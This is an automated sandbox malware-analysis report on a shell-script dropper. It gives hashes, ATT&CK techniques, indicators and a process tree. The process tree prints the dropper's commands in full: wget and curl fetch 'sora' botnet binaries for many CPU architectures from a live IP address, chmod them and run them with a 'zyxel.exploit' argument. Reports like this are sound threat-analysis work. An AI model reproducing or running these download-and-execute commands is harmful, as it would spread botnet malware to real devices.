Analysis
-
max time kernel
11s -
max time network
12s -
platform
debian-9_armhf -
resource
debian9-armhf-20240418-en -
resource tags
arch:armhfimage:debian9-armhf-20240418-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem -
submitted
18/10/2024, 03:03
Static task
static1
Behavioral task
behavioral1
Sample
ee5dc088769cd015612163e69ba1303ea2b9e39c8f1f942d2776a397b6b09670.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
ee5dc088769cd015612163e69ba1303ea2b9e39c8f1f942d2776a397b6b09670.sh
Resource
debian9-armhf-20240418-en
Behavioral task
behavioral3
Sample
ee5dc088769cd015612163e69ba1303ea2b9e39c8f1f942d2776a397b6b09670.sh
Resource
debian9-mipsbe-20240418-en
Behavioral task
behavioral4
Sample
ee5dc088769cd015612163e69ba1303ea2b9e39c8f1f942d2776a397b6b09670.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
ee5dc088769cd015612163e69ba1303ea2b9e39c8f1f942d2776a397b6b09670.sh
-
Size
2KB
-
MD5
eb7a4e59f642cd5475876f6ef1a09d3a
-
SHA1
9232db0ebfe888067cc85a32b786a7ce41be0a6f
-
SHA256
ee5dc088769cd015612163e69ba1303ea2b9e39c8f1f942d2776a397b6b09670
-
SHA512
9393df90cc409e4f6ee6a2fc7df960123823ca22c25f01ae4e2ab094f74f71f0565925aa0384a5e84f4b15792d89317af71b1f223fa7fdd340b4404f9a25c6b8
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 14 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 799 chmod 819 chmod 788 chmod 690 chmod 702 chmod 739 chmod 774 chmod 812 chmod 662 chmod 825 chmod 677 chmod 727 chmod 756 chmod 714 chmod -
Executes dropped EXE 14 IoCs
ioc pid Process /tmp/robben 665 robben /tmp/robben 678 robben /tmp/robben 691 robben /tmp/robben 704 robben /tmp/robben 716 robben /tmp/robben 728 robben /tmp/robben 741 robben /tmp/robben 757 robben /tmp/robben 776 robben /tmp/robben 789 robben /tmp/robben 801 robben /tmp/robben 813 robben /tmp/robben 820 robben /tmp/robben 826 robben -
Checks CPU configuration 1 TTPs 14 IoCs
Checks CPU information which indicate if the system is a virtual machine.
description ioc Process File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl -
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl -
System Network Configuration Discovery 1 TTPs 3 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 667 wget 675 curl 676 cat -
Writes file to tmp directory 1 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/robben ee5dc088769cd015612163e69ba1303ea2b9e39c8f1f942d2776a397b6b09670.sh
Processes
-
/tmp/ee5dc088769cd015612163e69ba1303ea2b9e39c8f1f942d2776a397b6b09670.sh/tmp/ee5dc088769cd015612163e69ba1303ea2b9e39c8f1f942d2776a397b6b09670.sh1⤵
- Writes file to tmp directory
PID:639 -
/usr/bin/wgetwget http://93.123.85.141/bins/sora.x862⤵PID:641
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.x862⤵
- Checks CPU configuration
- Reads runtime system information
PID:649
-
-
/bin/catcat sora.x862⤵PID:660
-
-
/bin/chmodchmod +x ee5dc088769cd015612163e69ba1303ea2b9e39c8f1f942d2776a397b6b09670.sh robben systemd-private-0de7d7b1eb1d4c3cacb13d23d5e782d3-systemd-timedated.service-y6qRHz2⤵
- File and Directory Permissions Modification
PID:662
-
-
/tmp/robben./robben zyxel.exploit2⤵
- Executes dropped EXE
PID:665
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.mips2⤵
- System Network Configuration Discovery
PID:667
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.mips2⤵
- Checks CPU configuration
- Reads runtime system information
- System Network Configuration Discovery
PID:675
-
-
/bin/catcat sora.mips2⤵
- System Network Configuration Discovery
PID:676
-
-
/bin/chmodchmod +x ee5dc088769cd015612163e69ba1303ea2b9e39c8f1f942d2776a397b6b09670.sh robben systemd-private-0de7d7b1eb1d4c3cacb13d23d5e782d3-systemd-timedated.service-y6qRHz2⤵
- File and Directory Permissions Modification
PID:677
-
-
/tmp/robben./robben zyxel.exploit2⤵
- Executes dropped EXE
PID:678
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.x86_642⤵PID:681
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.x86_642⤵
- Checks CPU configuration
- Reads runtime system information
PID:684
-
-
/bin/catcat sora.x86_642⤵PID:688
-
-
/bin/chmodchmod +x ee5dc088769cd015612163e69ba1303ea2b9e39c8f1f942d2776a397b6b09670.sh robben systemd-private-0de7d7b1eb1d4c3cacb13d23d5e782d3-systemd-timedated.service-y6qRHz2⤵
- File and Directory Permissions Modification
PID:690
-
-
/tmp/robben./robben zyxel.exploit2⤵
- Executes dropped EXE
PID:691
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.i4682⤵PID:694
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.i4682⤵
- Checks CPU configuration
- Reads runtime system information
PID:697
-
-
/bin/catcat sora.i4682⤵PID:700
-
-
/bin/chmodchmod +x ee5dc088769cd015612163e69ba1303ea2b9e39c8f1f942d2776a397b6b09670.sh robben systemd-private-0de7d7b1eb1d4c3cacb13d23d5e782d3-systemd-timedated.service-y6qRHz2⤵
- File and Directory Permissions Modification
PID:702
-
-
/tmp/robben./robben zyxel.exploit2⤵
- Executes dropped EXE
PID:704
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.i6862⤵PID:706
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.i6862⤵
- Checks CPU configuration
- Reads runtime system information
PID:709
-
-
/bin/catcat sora.i6862⤵PID:712
-
-
/bin/chmodchmod +x ee5dc088769cd015612163e69ba1303ea2b9e39c8f1f942d2776a397b6b09670.sh robben systemd-private-0de7d7b1eb1d4c3cacb13d23d5e782d3-systemd-timedated.service-y6qRHz2⤵
- File and Directory Permissions Modification
PID:714
-
-
/tmp/robben./robben zyxel.exploit2⤵
- Executes dropped EXE
PID:716
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.mpsl2⤵PID:718
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.mpsl2⤵
- Checks CPU configuration
- Reads runtime system information
PID:721
-
-
/bin/catcat sora.mpsl2⤵PID:725
-
-
/bin/chmodchmod +x ee5dc088769cd015612163e69ba1303ea2b9e39c8f1f942d2776a397b6b09670.sh robben systemd-private-0de7d7b1eb1d4c3cacb13d23d5e782d3-systemd-timedated.service-y6qRHz2⤵
- File and Directory Permissions Modification
PID:727
-
-
/tmp/robben./robben zyxel.exploit2⤵
- Executes dropped EXE
PID:728
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.arm42⤵PID:730
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.arm42⤵
- Checks CPU configuration
- Reads runtime system information
PID:733
-
-
/bin/catcat sora.arm42⤵PID:738
-
-
/bin/chmodchmod +x ee5dc088769cd015612163e69ba1303ea2b9e39c8f1f942d2776a397b6b09670.sh robben systemd-private-0de7d7b1eb1d4c3cacb13d23d5e782d3-systemd-timedated.service-y6qRHz2⤵
- File and Directory Permissions Modification
PID:739
-
-
/tmp/robben./robben zyxel.exploit2⤵
- Executes dropped EXE
PID:741
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.arm52⤵PID:744
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.arm52⤵
- Checks CPU configuration
- Reads runtime system information
PID:749
-
-
/bin/catcat sora.arm52⤵PID:754
-
-
/bin/chmodchmod +x ee5dc088769cd015612163e69ba1303ea2b9e39c8f1f942d2776a397b6b09670.sh robben systemd-private-0de7d7b1eb1d4c3cacb13d23d5e782d3-systemd-timedated.service-y6qRHz2⤵
- File and Directory Permissions Modification
PID:756
-
-
/tmp/robben./robben zyxel.exploit2⤵
- Executes dropped EXE
PID:757
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.arm62⤵PID:759
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.arm62⤵
- Checks CPU configuration
- Reads runtime system information
PID:761
-
-
/bin/catcat sora.arm62⤵PID:773
-
-
/bin/chmodchmod +x ee5dc088769cd015612163e69ba1303ea2b9e39c8f1f942d2776a397b6b09670.sh robben systemd-private-0de7d7b1eb1d4c3cacb13d23d5e782d3-systemd-timedated.service-y6qRHz2⤵
- File and Directory Permissions Modification
PID:774
-
-
/tmp/robben./robben zyxel.exploit2⤵
- Executes dropped EXE
PID:776
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.arm72⤵PID:779
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.arm72⤵
- Checks CPU configuration
- Reads runtime system information
PID:782
-
-
/bin/catcat sora.arm72⤵PID:786
-
-
/bin/chmodchmod +x ee5dc088769cd015612163e69ba1303ea2b9e39c8f1f942d2776a397b6b09670.sh robben systemd-private-0de7d7b1eb1d4c3cacb13d23d5e782d3-systemd-timedated.service-y6qRHz2⤵
- File and Directory Permissions Modification
PID:788
-
-
/tmp/robben./robben zyxel.exploit2⤵
- Executes dropped EXE
PID:789
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.ppc2⤵PID:792
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.ppc2⤵
- Checks CPU configuration
- Reads runtime system information
PID:795
-
-
/bin/catcat sora.ppc2⤵PID:798
-
-
/bin/chmodchmod +x ee5dc088769cd015612163e69ba1303ea2b9e39c8f1f942d2776a397b6b09670.sh robben systemd-private-0de7d7b1eb1d4c3cacb13d23d5e782d3-systemd-timedated.service-y6qRHz2⤵
- File and Directory Permissions Modification
PID:799
-
-
/tmp/robben./robben zyxel.exploit2⤵
- Executes dropped EXE
PID:801
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.ppc440fp2⤵PID:804
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.ppc440fp2⤵
- Checks CPU configuration
- Reads runtime system information
PID:807
-
-
/bin/catcat sora.ppc440fp2⤵PID:810
-
-
/bin/chmodchmod +x ee5dc088769cd015612163e69ba1303ea2b9e39c8f1f942d2776a397b6b09670.sh robben systemd-private-0de7d7b1eb1d4c3cacb13d23d5e782d3-systemd-timedated.service-y6qRHz2⤵
- File and Directory Permissions Modification
PID:812
-
-
/tmp/robben./robben zyxel.exploit2⤵
- Executes dropped EXE
PID:813
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.m68k2⤵PID:816
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.m68k2⤵
- Checks CPU configuration
- Reads runtime system information
PID:817
-
-
/bin/catcat sora.m68k2⤵PID:818
-
-
/bin/chmodchmod +x ee5dc088769cd015612163e69ba1303ea2b9e39c8f1f942d2776a397b6b09670.sh robben systemd-private-0de7d7b1eb1d4c3cacb13d23d5e782d3-systemd-timedated.service-y6qRHz2⤵
- File and Directory Permissions Modification
PID:819
-
-
/tmp/robben./robben zyxel.exploit2⤵
- Executes dropped EXE
PID:820
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.sh42⤵PID:822
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.sh42⤵
- Checks CPU configuration
- Reads runtime system information
PID:823
-
-
/bin/catcat sora.sh42⤵PID:824
-
-
/bin/chmodchmod +x ee5dc088769cd015612163e69ba1303ea2b9e39c8f1f942d2776a397b6b09670.sh robben systemd-private-0de7d7b1eb1d4c3cacb13d23d5e782d3-systemd-timedated.service-y6qRHz2⤵
- File and Directory Permissions Modification
PID:825
-
-
/tmp/robben./robben zyxel.exploit2⤵
- Executes dropped EXE
PID:826
-
Network
MITRE ATT&CK Enterprise v15
Defense Evasion
File and Directory Permissions Modification
1Linux and Mac File and Directory Permissions Modification
1Virtualization/Sandbox Evasion
1System Checks
1